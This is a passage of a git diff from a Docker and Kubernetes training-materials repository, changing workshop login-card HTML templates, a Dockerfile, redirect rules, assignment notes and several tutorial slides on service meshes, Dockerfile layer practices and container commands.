margin: 0.4em 0 0.4em 0;
|
||||
}
|
||||
|
||||
div.back {
|
||||
border: 1px dotted white;
|
||||
}
|
||||
|
||||
div.back p {
|
||||
margin: 0.5em 1em 0 1em;
|
||||
}
|
||||
|
||||
img {
|
||||
height: 4em;
|
||||
float: right;
|
||||
margin-right: -0.4em;
|
||||
margin-right: -0.2em;
|
||||
}
|
||||
|
||||
/*
|
||||
img.enix {
|
||||
height: 4.0em;
|
||||
margin-top: 0.4em;
|
||||
}
|
||||
|
||||
img.kube {
|
||||
height: 4.2em;
|
||||
margin-top: 1.7em;
|
||||
}
|
||||
*/
|
||||
|
||||
.logpass {
|
||||
font-family: monospace;
|
||||
font-weight: bold;
|
||||
@@ -69,19 +158,15 @@ img {
|
||||
</style></head>
|
||||
<body>
|
||||
{% for cluster in clusters %}
|
||||
{% if loop.index0>0 and loop.index0%pagesize==0 %}
|
||||
<span class="pagebreak"></span>
|
||||
{% endif %}
|
||||
<div>
|
||||
|
||||
<p>
|
||||
Here is the connection information to your very own
|
||||
{{ cluster_or_machine }} for this {{ workshop_name }}.
|
||||
You can connect to {{ this_or_each }} VM with any SSH client.
|
||||
</p>
|
||||
<p>{{ intro }}</p>
|
||||
<p>
|
||||
<img src="{{ image_src }}" />
|
||||
<table>
|
||||
{% if clusternumber != None %}
|
||||
<tr><td>cluster:</td></tr>
|
||||
<tr><td class="logpass">{{ clusternumber + loop.index }}</td></tr>
|
||||
{% endif %}
|
||||
<tr><td>login:</td></tr>
|
||||
<tr><td class="logpass">docker</td></tr>
|
||||
<tr><td>password:</td></tr>
|
||||
@@ -90,17 +175,44 @@ img {
|
||||
|
||||
</p>
|
||||
<p>
|
||||
Your {{ machine_is_or_machines_are }}:
|
||||
{{ listhead }}
|
||||
<table>
|
||||
{% for node in cluster %}
|
||||
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
|
||||
<tr>
|
||||
<td>{{ clusterprefix }}{{ loop.index }}:</td>
|
||||
<td>{{ node }}</td>
|
||||
</tr>
|
||||
{% endfor %}
|
||||
</table>
|
||||
</p>
|
||||
<p>You can find the slides at:
|
||||
|
||||
<p>
|
||||
{{ slides_are_at }}
|
||||
<center>{{ url }}</center>
|
||||
</p>
|
||||
</div>
|
||||
{% if loop.index%pagesize==0 or loop.last %}
|
||||
<span class="pagebreak"></span>
|
||||
{% if backside %}
|
||||
{% for x in range(pagesize) %}
|
||||
<div class="back">
|
||||
<br/>
|
||||
<p>You got this at the workshop
|
||||
"Getting Started With Kubernetes and Container Orchestration"
|
||||
during QCON London (March 2019).</p>
|
||||
<p>If you liked that workshop,
|
||||
I can train your team or organization
|
||||
on Docker, container, and Kubernetes,
|
||||
with curriculums of 1 to 5 days.
|
||||
</p>
|
||||
<p>Interested? Contact me at:</p>
|
||||
<p>jerome.petazzoni@gmail.com</p>
|
||||
<p>Thank you!</p>
|
||||
</div>
|
||||
{% endfor %}
|
||||
<span class="pagebreak"></span>
|
||||
{% endif %}
|
||||
{% endif %}
|
||||
{% endfor %}
|
||||
</body>
|
||||
</html>
|
||||
|
||||
@@ -1,121 +0,0 @@
|
||||
{# Feel free to customize or override anything in there! #}
|
||||
{%- set url = "http://FIXME.container.training" -%}
|
||||
{%- set pagesize = 9 -%}
|
||||
{%- if clustersize == 1 -%}
|
||||
{%- set workshop_name = "Docker workshop" -%}
|
||||
{%- set cluster_or_machine = "machine virtuelle" -%}
|
||||
{%- set this_or_each = "cette" -%}
|
||||
{%- set plural = "" -%}
|
||||
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
|
||||
{%- else -%}
|
||||
{%- set workshop_name = "Kubernetes workshop" -%}
|
||||
{%- set cluster_or_machine = "cluster" -%}
|
||||
{%- set this_or_each = "chaque" -%}
|
||||
{%- set plural = "s" -%}
|
||||
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
|
||||
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
|
||||
{%- set image_src = image_src_kube -%}
|
||||
{%- endif -%}
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
|
||||
<html>
|
||||
<head><style>
|
||||
@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
|
||||
|
||||
body, table {
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
line-height: 1em;
|
||||
font-size: 15px;
|
||||
font-family: 'Slabo 27px';
|
||||
}
|
||||
|
||||
table {
|
||||
border-spacing: 0;
|
||||
margin-top: 0.4em;
|
||||
margin-bottom: 0.4em;
|
||||
border-left: 0.8em double grey;
|
||||
padding-left: 0.4em;
|
||||
}
|
||||
|
||||
div {
|
||||
float: left;
|
||||
border: 1px dotted black;
|
||||
padding-top: 1%;
|
||||
padding-bottom: 1%;
|
||||
/* columns * (width+left+right) < 100% */
|
||||
width: 30%;
|
||||
padding-left: 1.5%;
|
||||
padding-right: 1.5%;
|
||||
}
|
||||
|
||||
p {
|
||||
margin: 0.4em 0 0.4em 0;
|
||||
}
|
||||
|
||||
img {
|
||||
height: 4em;
|
||||
float: right;
|
||||
margin-right: -0.3em;
|
||||
}
|
||||
|
||||
img.enix {
|
||||
height: 4.0em;
|
||||
margin-top: 0.4em;
|
||||
}
|
||||
|
||||
img.kube {
|
||||
height: 4.2em;
|
||||
margin-top: 1.7em;
|
||||
}
|
||||
|
||||
.logpass {
|
||||
font-family: monospace;
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
.pagebreak {
|
||||
page-break-after: always;
|
||||
clear: both;
|
||||
display: block;
|
||||
height: 8px;
|
||||
}
|
||||
</style></head>
|
||||
<body>
|
||||
{% for cluster in clusters %}
|
||||
{% if loop.index0>0 and loop.index0%pagesize==0 %}
|
||||
<span class="pagebreak"></span>
|
||||
{% endif %}
|
||||
<div>
|
||||
|
||||
<p>
|
||||
Voici les informations permettant de se connecter à votre
|
||||
{{ cluster_or_machine }} pour cette formation.
|
||||
Vous pouvez vous connecter à {{ this_or_each }} machine virtuelle
|
||||
avec n'importe quel client SSH.
|
||||
</p>
|
||||
<p>
|
||||
<img class="enix" src="https://enix.io/static/img/logos/logo-domain-cropped.png" />
|
||||
<table>
|
||||
<tr><td>identifiant:</td></tr>
|
||||
<tr><td class="logpass">docker</td></tr>
|
||||
<tr><td>mot de passe:</td></tr>
|
||||
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
|
||||
</table>
|
||||
|
||||
</p>
|
||||
<p>
|
||||
Adresse{{ plural }} IP :
|
||||
<!--<img class="kube" src="{{ image_src }}" />-->
|
||||
<table>
|
||||
{% for node in cluster %}
|
||||
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
|
||||
{% endfor %}
|
||||
</table>
|
||||
</p>
|
||||
<p>Le support de formation est à l'adresse suivante :
|
||||
<center>{{ url }}</center>
|
||||
</p>
|
||||
</div>
|
||||
{% endfor %}
|
||||
</body>
|
||||
</html>
|
||||
@@ -1,134 +0,0 @@
|
||||
{# Feel free to customize or override anything in there! #}
|
||||
{%- set url = "http://qconuk2019.container.training/" -%}
|
||||
{%- set pagesize = 9 -%}
|
||||
{%- if clustersize == 1 -%}
|
||||
{%- set workshop_name = "Docker workshop" -%}
|
||||
{%- set cluster_or_machine = "machine" -%}
|
||||
{%- set this_or_each = "this" -%}
|
||||
{%- set machine_is_or_machines_are = "machine is" -%}
|
||||
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
|
||||
{%- else -%}
|
||||
{%- set workshop_name = "Kubernetes workshop" -%}
|
||||
{%- set cluster_or_machine = "cluster" -%}
|
||||
{%- set this_or_each = "each" -%}
|
||||
{%- set machine_is_or_machines_are = "machines are" -%}
|
||||
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
|
||||
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
|
||||
{%- set image_src = image_src_kube -%}
|
||||
{%- endif -%}
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
|
||||
<html>
|
||||
<head><style>
|
||||
@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
|
||||
body, table {
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
line-height: 1.0em;
|
||||
font-size: 15px;
|
||||
font-family: 'Slabo 27px';
|
||||
}
|
||||
|
||||
table {
|
||||
border-spacing: 0;
|
||||
margin-top: 0.4em;
|
||||
margin-bottom: 0.4em;
|
||||
border-left: 0.8em double grey;
|
||||
padding-left: 0.4em;
|
||||
}
|
||||
|
||||
div {
|
||||
float: left;
|
||||
border: 1px dotted black;
|
||||
height: 31%;
|
||||
padding-top: 1%;
|
||||
padding-bottom: 1%;
|
||||
/* columns * (width+left+right) < 100% */
|
||||
width: 30%;
|
||||
padding-left: 1.5%;
|
||||
padding-right: 1.5%;
|
||||
}
|
||||
|
||||
div.back {
|
||||
border: 1px dotted white;
|
||||
}
|
||||
|
||||
div.back p {
|
||||
margin: 0.5em 1em 0 1em;
|
||||
}
|
||||
|
||||
p {
|
||||
margin: 0.4em 0 0.8em 0;
|
||||
}
|
||||
|
||||
img {
|
||||
height: 5em;
|
||||
float: right;
|
||||
margin-right: 1em;
|
||||
}
|
||||
|
||||
.logpass {
|
||||
font-family: monospace;
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
.pagebreak {
|
||||
page-break-after: always;
|
||||
clear: both;
|
||||
display: block;
|
||||
height: 8px;
|
||||
}
|
||||
</style></head>
|
||||
<body>
|
||||
{% for cluster in clusters %}
|
||||
<div>
|
||||
|
||||
<p>
|
||||
Here is the connection information to your very own
|
||||
{{ cluster_or_machine }} for this {{ workshop_name }}.
|
||||
You can connect to {{ this_or_each }} VM with any SSH client.
|
||||
</p>
|
||||
<p>
|
||||
<img src="{{ image_src }}" />
|
||||
<table>
|
||||
<tr><td>login:</td></tr>
|
||||
<tr><td class="logpass">docker</td></tr>
|
||||
<tr><td>password:</td></tr>
|
||||
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
|
||||
</table>
|
||||
|
||||
</p>
|
||||
<p>
|
||||
Your {{ machine_is_or_machines_are }}:
|
||||
<table>
|
||||
{% for node in cluster %}
|
||||
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
|
||||
{% endfor %}
|
||||
</table>
|
||||
</p>
|
||||
<p>You can find the slides at:
|
||||
<center>{{ url }}</center>
|
||||
</p>
|
||||
</div>
|
||||
{% if loop.index%pagesize==0 or loop.last %}
|
||||
<span class="pagebreak"></span>
|
||||
{% for x in range(pagesize) %}
|
||||
<div class="back">
|
||||
<br/>
|
||||
<p>You got this at the workshop
|
||||
"Getting Started With Kubernetes and Container Orchestration"
|
||||
during QCON London (March 2019).</p>
|
||||
<p>If you liked that workshop,
|
||||
I can train your team or organization
|
||||
on Docker, container, and Kubernetes,
|
||||
with curriculums of 1 to 5 days.
|
||||
</p>
|
||||
<p>Interested? Contact me at:</p>
|
||||
<p>jerome.petazzoni@gmail.com</p>
|
||||
<p>Thank you!</p>
|
||||
</div>
|
||||
{% endfor %}
|
||||
<span class="pagebreak"></span>
|
||||
{% endif %}
|
||||
{% endfor %}
|
||||
</body>
|
||||
</html>
|
||||
@@ -1,106 +0,0 @@
|
||||
{# Feel free to customize or override anything in there! #}
|
||||
{%- set url = "http://container.training/" -%}
|
||||
{%- set pagesize = 12 -%}
|
||||
{%- if clustersize == 1 -%}
|
||||
{%- set workshop_name = "Docker workshop" -%}
|
||||
{%- set cluster_or_machine = "machine" -%}
|
||||
{%- set this_or_each = "this" -%}
|
||||
{%- set machine_is_or_machines_are = "machine is" -%}
|
||||
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
|
||||
{%- else -%}
|
||||
{%- set workshop_name = "Kubernetes workshop" -%}
|
||||
{%- set cluster_or_machine = "cluster" -%}
|
||||
{%- set this_or_each = "each" -%}
|
||||
{%- set machine_is_or_machines_are = "machines are" -%}
|
||||
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
|
||||
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
|
||||
{%- set image_src = image_src_kube -%}
|
||||
{%- endif -%}
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
|
||||
<html>
|
||||
<head><style>
|
||||
body, table {
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
line-height: 1em;
|
||||
font-size: 14px;
|
||||
}
|
||||
|
||||
table {
|
||||
border-spacing: 0;
|
||||
margin-top: 0.4em;
|
||||
margin-bottom: 0.4em;
|
||||
border-left: 0.8em double grey;
|
||||
padding-left: 0.4em;
|
||||
}
|
||||
|
||||
div {
|
||||
float: left;
|
||||
border: 1px dotted black;
|
||||
padding-top: 1%;
|
||||
padding-bottom: 1%;
|
||||
/* columns * (width+left+right) < 100% */
|
||||
width: 21.5%;
|
||||
padding-left: 1.5%;
|
||||
padding-right: 1.5%;
|
||||
}
|
||||
|
||||
p {
|
||||
margin: 0.4em 0 0.4em 0;
|
||||
}
|
||||
|
||||
img {
|
||||
height: 4em;
|
||||
float: right;
|
||||
margin-right: -0.4em;
|
||||
}
|
||||
|
||||
.logpass {
|
||||
font-family: monospace;
|
||||
font-weight: bold;
|
||||
}
|
||||
|
||||
.pagebreak {
|
||||
page-break-after: always;
|
||||
clear: both;
|
||||
display: block;
|
||||
height: 8px;
|
||||
}
|
||||
</style></head>
|
||||
<body>
|
||||
{% for cluster in clusters %}
|
||||
{% if loop.index0>0 and loop.index0%pagesize==0 %}
|
||||
<span class="pagebreak"></span>
|
||||
{% endif %}
|
||||
<div>
|
||||
|
||||
<p>
|
||||
Here is the connection information to your very own
|
||||
{{ cluster_or_machine }} for this {{ workshop_name }}.
|
||||
You can connect to {{ this_or_each }} VM with any SSH client.
|
||||
</p>
|
||||
<p>
|
||||
<img src="{{ image_src }}" />
|
||||
<table>
|
||||
<tr><td>login:</td></tr>
|
||||
<tr><td class="logpass">docker</td></tr>
|
||||
<tr><td>password:</td></tr>
|
||||
<tr><td class="logpass">{{ docker_user_password }}</td></tr>
|
||||
</table>
|
||||
|
||||
</p>
|
||||
<p>
|
||||
Your {{ machine_is_or_machines_are }}:
|
||||
<table>
|
||||
{% for node in cluster %}
|
||||
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
|
||||
{% endfor %}
|
||||
</table>
|
||||
</p>
|
||||
<p>You can find the slides at:
|
||||
<center>{{ url }}</center>
|
||||
</p>
|
||||
</div>
|
||||
{% endfor %}
|
||||
</body>
|
||||
</html>
|
||||
@@ -1,4 +1,4 @@
|
||||
FROM alpine:3.11
|
||||
RUN apk add --no-cache entr py3-pip git zip
|
||||
FROM alpine:3.9
|
||||
RUN apk add --no-cache entr py-pip git
|
||||
COPY requirements.txt .
|
||||
RUN pip3 install -r requirements.txt
|
||||
RUN pip install -r requirements.txt
|
||||
|
||||
@@ -1 +1,7 @@
|
||||
/ /kube-fullday.yml.html 200!
|
||||
# Uncomment and/or edit one of the the following lines if necessary.
|
||||
#/ /kube-halfday.yml.html 200
|
||||
#/ /kube-fullday.yml.html 200
|
||||
#/ /kube-twodays.yml.html 200
|
||||
|
||||
# And this allows to do "git clone https://container.training".
|
||||
/info/refs service=git-upload-pack https://github.com/jpetazzo/container.training/info/refs?service=git-upload-pack
|
||||
|
||||
34
slides/assignments/TODO.txt
Normal file
@@ -0,0 +1,34 @@
|
||||
# Our sample application
|
||||
|
||||
No assignment
|
||||
|
||||
# Kubernetes concepts
|
||||
|
||||
Do we want some kind of multiple-choice quiz?
|
||||
|
||||
# First contact with kubectl
|
||||
|
||||
Start some pre-defined image and check its logs
|
||||
(Do we want to make a custom "mystery image" that shows a message
|
||||
and then sleeps forever?)
|
||||
|
||||
Start another one (to make sure they understand that they need
|
||||
to specify a unique name each time)
|
||||
|
||||
Provide as many ways as you can to figure out on which node
|
||||
these pods are running (even if you only have one node).
|
||||
|
||||
# Exposing containers
|
||||
|
||||
Start a container running the official tomcat image.
|
||||
Expose it.
|
||||
Connect to it.
|
||||
|
||||
# Shipping apps
|
||||
|
||||
(We need a few images for a demo app other than DockerCoins?)
|
||||
|
||||
Start the components of the app.
|
||||
Expose what needs to be exposed.
|
||||
Connect to the app and check that it works.
|
||||
|
||||
105
slides/assignments/setup.md
Normal file
@@ -0,0 +1,105 @@
|
||||
## Assignment: get Kubernetes
|
||||
|
||||
- In order to do the other assignments, we need a Kubernetes cluster
|
||||
|
||||
- Here are some *free* options:
|
||||
|
||||
- Docker Desktop
|
||||
|
||||
- Minikube
|
||||
|
||||
- Online sandbox like Katacoda
|
||||
|
||||
- You can also get a managed cluster (but this costs some money)
|
||||
|
||||
---
|
||||
|
||||
## Recommendation 1: Docker Desktop
|
||||
|
||||
- If you are already using Docker Desktop, use it for Kubernetes
|
||||
|
||||
- If you are running MacOS, [install Docker Desktop](https://docs.docker.com/docker-for-mac/install/)
|
||||
|
||||
- you will need a post-2010 Mac
|
||||
|
||||
- you will need macOS Sierra 10.12 or later
|
||||
|
||||
- If you are running Windows 10, [install Docker Desktop](https://docs.docker.com/docker-for-windows/install/)
|
||||
|
||||
- you will need Windows 10 64 bits Pro, Enterprise, or Education
|
||||
|
||||
- virtualization needs to be enabled in your BIOS
|
||||
|
||||
- Then [enable Kubernetes](https://blog.docker.com/2018/07/kubernetes-is-now-available-in-docker-desktop-stable-channel/) if it's not already on
|
||||
|
||||
---
|
||||
|
||||
## Recommendation 2: Minikube
|
||||
|
||||
- In some scenarios, you can't use Docker Desktop:
|
||||
|
||||
- if you run Linux
|
||||
|
||||
- if you are running an unsupported version of Windows
|
||||
|
||||
- You might also want to install Minikube for other reasons
|
||||
|
||||
(there are more tutorials and instructions out there for Minikube)
|
||||
|
||||
- Minikube installation is a bit more complex
|
||||
|
||||
(depending on which hypervisor and OS you are using)
|
||||
|
||||
---
|
||||
|
||||
## Minikube installation details
|
||||
|
||||
- Minikube typically runs in a local virtual machine
|
||||
|
||||
- It supports multiple hypervisors:
|
||||
|
||||
- VirtualBox (Linux, Mac, Windows)
|
||||
|
||||
- HyperV (Windows)
|
||||
|
||||
- HyperKit, VMware (Mac)
|
||||
|
||||
- KVM (Linux)
|
||||
|
||||
- Check the [documentation](https://kubernetes.io/docs/tasks/tools/install-minikube/) for details relevant to your setup
|
||||
|
||||
---
|
||||
|
||||
## Recommendation 3: learning platform
|
||||
|
||||
- Sometimes, you can't even install Minikube
|
||||
|
||||
(computer locked by IT policies; insufficient resources...)
|
||||
|
||||
- In that case, you can use a platform like:
|
||||
|
||||
- Katacoda
|
||||
|
||||
- Play-with-Kubernetes
|
||||
|
||||
---
|
||||
|
||||
## Recommendation 4: hosted cluster
|
||||
|
||||
- You can also get your own hosted cluster
|
||||
|
||||
- This will cost a little bit of money
|
||||
|
||||
(unless you have free hosting credits)
|
||||
|
||||
- Setup will vary depending on the provider, platform, etc.
|
||||
|
||||
---
|
||||
|
||||
class: assignment
|
||||
|
||||
- Make sure that you have a Kubernetes cluster
|
||||
|
||||
- You should be able to run `kubectl get nodes` and see a list of nodes
|
||||
|
||||
- These nodes should be in `Ready` state
|
||||
@@ -14,7 +14,6 @@ once)
|
||||
./appendcheck.py $YAML.html
|
||||
done
|
||||
fi
|
||||
zip -qr slides.zip . && echo "Created slides.zip archive."
|
||||
;;
|
||||
|
||||
forever)
|
||||
|
||||
@@ -150,7 +150,7 @@ Different deployments will use different underlying technologies.
|
||||
* Ad-hoc deployments can use a master-less discovery protocol
|
||||
like avahi to register and discover services.
|
||||
* It is also possible to do one-shot reconfiguration of the
|
||||
ambassadors. It is slightly less dynamic but has much less
|
||||
ambassadors. It is slightly less dynamic but has far fewer
|
||||
requirements.
|
||||
* Ambassadors can be used in addition to, or instead of, overlay networks.
|
||||
|
||||
@@ -186,22 +186,48 @@ Different deployments will use different underlying technologies.
|
||||
|
||||
---
|
||||
|
||||
## Section summary
|
||||
## Some popular service meshes
|
||||
|
||||
We've learned how to:
|
||||
... And related projects:
|
||||
|
||||
* Understand the ambassador pattern and what it is used for (service portability).
|
||||
* [Consul Connect](https://www.consul.io/docs/connect/index.html)
|
||||
<br/>
|
||||
Transparently secures service-to-service connections with mTLS.
|
||||
|
||||
For more information about the ambassador pattern, including demos on Swarm and ECS:
|
||||
|
||||
* AWS re:invent 2015 [DVO317](https://www.youtube.com/watch?v=7CZFpHUPqXw)
|
||||
|
||||
* [SwarmWeek video about Swarm+Compose](https://youtube.com/watch?v=qbIvUvwa6As)
|
||||
|
||||
Some services meshes and related projects:
|
||||
* [Gloo](https://gloo.solo.io/)
|
||||
<br/>
|
||||
API gateway that can interconnect applications on VMs, containers, and serverless.
|
||||
|
||||
* [Istio](https://istio.io/)
|
||||
<br/>
|
||||
A popular service mesh.
|
||||
|
||||
* [Linkerd](https://linkerd.io/)
|
||||
<br/>
|
||||
Another popular service mesh.
|
||||
|
||||
* [Gloo](https://gloo.solo.io/)
|
||||
---
|
||||
|
||||
## Learning more about service meshes
|
||||
|
||||
A few blog posts about service meshes:
|
||||
|
||||
* [Containers, microservices, and service meshes](http://jpetazzo.github.io/2019/05/17/containers-microservices-service-meshes/)
|
||||
<br/>
|
||||
Provides historical context: how did we do before service meshes were invented?
|
||||
|
||||
* [Do I Need a Service Mesh?](https://www.nginx.com/blog/do-i-need-a-service-mesh/)
|
||||
<br/>
|
||||
Explains the purpose of service meshes. Illustrates some NGINX features.
|
||||
|
||||
* [Do you need a service mesh?](https://www.oreilly.com/ideas/do-you-need-a-service-mesh)
|
||||
<br/>
|
||||
Includes high-level overview and definitions.
|
||||
|
||||
* [What is Service Mesh and Why Do We Need It?](https://containerjournal.com/2018/12/12/what-is-service-mesh-and-why-do-we-need-it/)
|
||||
<br/>
|
||||
Includes a step-by-step demo of Linkerd.
|
||||
|
||||
And a video:
|
||||
|
||||
* [What is a Service Mesh, and Do I Need One When Developing Microservices?](https://www.datawire.io/envoyproxy/service-mesh/)
|
||||
|
||||
@@ -98,13 +98,13 @@ COPY prometheus.conf /etc
|
||||
|
||||
* Allows arbitrary customization and complex configuration files.
|
||||
|
||||
* Requires to write a configuration file. (Obviously!)
|
||||
* Requires writing a configuration file. (Obviously!)
|
||||
|
||||
* Requires to build an image to start the service.
|
||||
* Requires building an image to start the service.
|
||||
|
||||
* Requires to rebuild the image to reconfigure the service.
|
||||
* Requires rebuilding the image to reconfigure the service.
|
||||
|
||||
* Requires to rebuild the image to upgrade the service.
|
||||
* Requires rebuilding the image to upgrade the service.
|
||||
|
||||
* Configured images can be stored in registries.
|
||||
|
||||
@@ -132,11 +132,11 @@ docker run -v appconfig:/etc/appconfig myapp
|
||||
|
||||
* Allows arbitrary customization and complex configuration files.
|
||||
|
||||
* Requires to create a volume for each different configuration.
|
||||
* Requires creating a volume for each different configuration.
|
||||
|
||||
* Services with identical configurations can use the same volume.
|
||||
|
||||
* Doesn't require to build / rebuild an image when upgrading / reconfiguring.
|
||||
* Doesn't require building / rebuilding an image when upgrading / reconfiguring.
|
||||
|
||||
* Configuration can be generated or edited through another container.
|
||||
|
||||
@@ -198,4 +198,4 @@ E.g.:
|
||||
|
||||
- read the secret on stdin when the service starts,
|
||||
|
||||
- pass the secret using an API endpoint.
|
||||
- pass the secret using an API endpoint.
|
||||
|
||||
@@ -257,7 +257,7 @@ $ docker kill 068 57ad
|
||||
The `stop` and `kill` commands can take multiple container IDs.
|
||||
|
||||
Those containers will be terminated immediately (without
|
||||
the 10 seconds delay).
|
||||
the 10-second delay).
|
||||
|
||||
Let's check that our containers don't show up anymore:
|
||||
|
||||
|
||||
@@ -222,16 +222,16 @@ CMD ["hello world"]
|
||||
Let's build it:
|
||||
|
||||
```bash
|
||||
$ docker build -t figlet .
|
||||
$ docker build -t myfiglet .
|
||||
...
|
||||
Successfully built 6e0b6a048a07
|
||||
Successfully tagged figlet:latest
|
||||
Successfully tagged myfiglet:latest
|
||||
```
|
||||
|
||||
Run it without parameters:
|
||||
|
||||
```bash
|
||||
$ docker run figlet
|
||||
$ docker run myfiglet
|
||||
_ _ _ _
|
||||
| | | | | | | | |
|
||||
| | _ | | | | __ __ ,_ | | __|
|
||||
@@ -246,7 +246,7 @@ $ docker run figlet
|
||||
Now let's pass extra arguments to the image.
|
||||
|
||||
```bash
|
||||
$ docker run figlet hola mundo
|
||||
$ docker run myfiglet hola mundo
|
||||
_ _
|
||||
| | | | |
|
||||
| | __ | | __, _ _ _ _ _ __| __
|
||||
@@ -262,13 +262,13 @@ We overrode `CMD` but still used `ENTRYPOINT`.
|
||||
|
||||
What if we want to run a shell in our container?
|
||||
|
||||
We cannot just do `docker run figlet bash` because
|
||||
We cannot just do `docker run myfiglet bash` because
|
||||
that would just tell figlet to display the word "bash."
|
||||
|
||||
We use the `--entrypoint` parameter:
|
||||
|
||||
```bash
|
||||
$ docker run -it --entrypoint bash figlet
|
||||
$ docker run -it --entrypoint bash myfiglet
|
||||
root@6027e44e2955:/#
|
||||
```
|
||||
|
||||
|
||||
@@ -86,7 +86,7 @@ like Windows, macOS, Solaris, FreeBSD ...
|
||||
|
||||
* No notion of image (container filesystems have to be managed manually).
|
||||
|
||||
* Networking has to be setup manually.
|
||||
* Networking has to be set up manually.
|
||||
|
||||
---
|
||||
|
||||
@@ -112,7 +112,7 @@ like Windows, macOS, Solaris, FreeBSD ...
|
||||
|
||||
* Strong emphasis on security (through privilege separation).
|
||||
|
||||
* Networking has to be setup separately (e.g. through CNI plugins).
|
||||
* Networking has to be set up separately (e.g. through CNI plugins).
|
||||
|
||||
* Partial image management (pull, but no push).
|
||||
|
||||
@@ -152,7 +152,7 @@ We're not aware of anyone using it directly (i.e. outside of Kubernetes).
|
||||
|
||||
* Basic image support (tar archives and raw disk images).
|
||||
|
||||
* Network has to be setup manually.
|
||||
* Network has to be set up manually.
|
||||
|
||||
---
|
||||
|
||||
@@ -164,7 +164,7 @@ We're not aware of anyone using it directly (i.e. outside of Kubernetes).
|
||||
|
||||
* Run each container in a lightweight virtual machine.
|
||||
|
||||
* Requires to run on bare metal *or* with nested virtualization.
|
||||
* Requires running on bare metal *or* with nested virtualization.
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -474,7 +474,7 @@ When creating a network, extra options can be provided.
|
||||
|
||||
* `--ip-range` (in CIDR notation) indicates the subnet to allocate from.
|
||||
|
||||
* `--aux-address` allows to specify a list of reserved addresses (which won't be allocated to containers).
|
||||
* `--aux-address` allows specifying a list of reserved addresses (which won't be allocated to containers).
|
||||
|
||||
---
|
||||
|
||||
@@ -528,7 +528,9 @@ Very short instructions:
|
||||
- `docker network create mynet --driver overlay`
|
||||
- `docker service create --network mynet myimage`
|
||||
|
||||
See https://jpetazzo.github.io/container.training for all the deets about clustering!
|
||||
If you want to learn more about Swarm mode, you can check
|
||||
[this video](https://www.youtube.com/watch?v=EuzoEaE6Cqs)
|
||||
or [these slides](https://container.training/swarm-selfpaced.yml.html).
|
||||
|
||||
---
|
||||
|
||||
@@ -554,7 +556,7 @@ General idea:
|
||||
|
||||
* So far, we have specified which network to use when starting the container.
|
||||
|
||||
* The Docker Engine also allows to connect and disconnect while the container runs.
|
||||
* The Docker Engine also allows connecting and disconnecting while the container is running.
|
||||
|
||||
* This feature is exposed through the Docker API, and through two Docker CLI commands:
|
||||
|
||||
|
||||
@@ -76,6 +76,78 @@ CMD ["python", "app.py"]
|
||||
|
||||
---
|
||||
|
||||
## Be careful with `chown`, `chmod`, `mv`
|
||||
|
||||
* Layers cannot store efficiently changes in permissions or ownership.
|
||||
|
||||
* Layers cannot represent efficiently when a file is moved either.
|
||||
|
||||
* As a result, operations like `chown`, `chown`, `mv` can be expensive.
|
||||
|
||||
* For instance, in the Dockerfile snippet below, each `RUN` line
|
||||
creates a layer with an entire copy of `some-file`.
|
||||
|
||||
```dockerfile
|
||||
COPY some-file .
|
||||
RUN chown www-data:www-data some-file
|
||||
RUN chmod 644 some-file
|
||||
RUN mv some-file /var/www
|
||||
```
|
||||
|
||||
* How can we avoid that?
|
||||
|
||||
---
|
||||
|
||||
## Put files on the right place
|
||||
|
||||
* Instead of using `mv`, directly put files at the right place.
|
||||
|
||||
* When extracting archives (tar, zip...), merge operations in a single layer.
|
||||
|
||||
Example:
|
||||
|
||||
```dockerfile
|
||||
...
|
||||
RUN wget http://.../foo.tar.gz \
|
||||
&& tar -zxf foo.tar.gz \
|
||||
&& mv foo/fooctl /usr/local/bin \
|
||||
&& rm -rf foo
|
||||
...
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Use `COPY --chown`
|
||||
|
||||
* The Dockerfile instruction `COPY` can take a `--chown` parameter.
|
||||
|
||||
Examples:
|
||||
|
||||
```dockerfile
|
||||
...
|
||||
COPY --chown=1000 some-file .
|
||||
COPY --chown=1000:1000 some-file .
|
||||
COPY --chown=www-data:www-data some-file .
|
||||
```
|
||||
|
||||
* The `--chown` flag can specify a user, or a user:group pair.
|
||||
|
||||
* The user and group can be specified as names or numbers.
|
||||
|
||||
* When using names, the names must exist in `/etc/passwd` or `/etc/group`.
|
||||
|
||||
*(In the container, not on the host!)*
|
||||
|
||||
---
|
||||
|
||||
## Set correct permissions locally
|
||||
|
||||
* Instead of using `chmod`, set the right file permissions locally.
|
||||
|
||||
* When files are copied with `COPY`, permissions are preserved.
|
||||
|
||||
---
|
||||
|
||||
## Embedding unit tests in the build process
|
||||
|
||||
```dockerfile
|
||||
|
||||
5
slides/containers/Exercise_Composefile.md
Normal file
